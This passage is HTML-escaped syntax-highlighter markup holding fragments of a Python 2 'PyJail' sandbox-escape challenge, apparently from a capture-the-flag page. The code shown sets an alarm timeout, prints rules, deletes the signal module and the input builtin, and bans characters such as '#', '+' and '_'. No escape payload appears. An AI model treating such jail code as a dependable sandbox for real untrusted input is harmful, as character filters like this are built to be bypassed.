!important;&quot;&gt;SIGALRM&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;handler&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-83&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;alarm&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-84&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-85&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&quot;&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-86&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-87&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;PyJail&amp;nbsp;&amp;nbsp; /__\\&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-88&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ____________|&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-89&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |_|_|_|_|_|_|&amp;nbsp;&amp;nbsp;|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-90&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |_|_|_|_|_|_|__|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-91&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;A@\\|_|_|_|_|_|/@@Aa&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-92&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp; aaA@@@@@@@@@@@@@@@@@@@aaaA&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-93&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;A@@@@@@@@@@@@@@@@@@@@@@@@@@A&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-94&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-95&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;[!] Rule&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-96&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;1. After 3 day, the Light will be Turned Off then you Cannot see anything.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-97&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;2. Cannot Use Some Special Characters in PyJail.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-98&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;3. For 10 days, You can enter 38 characters per day.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-99&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-100&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;Can You Escape from Here ??&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-101&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-102&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-103&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;del&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-104&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;del&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;__builtins__&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-105&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;ban_list&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'#'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'+'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'-'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'_'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'&quot;'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-106&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-107&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot; Name : &quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; 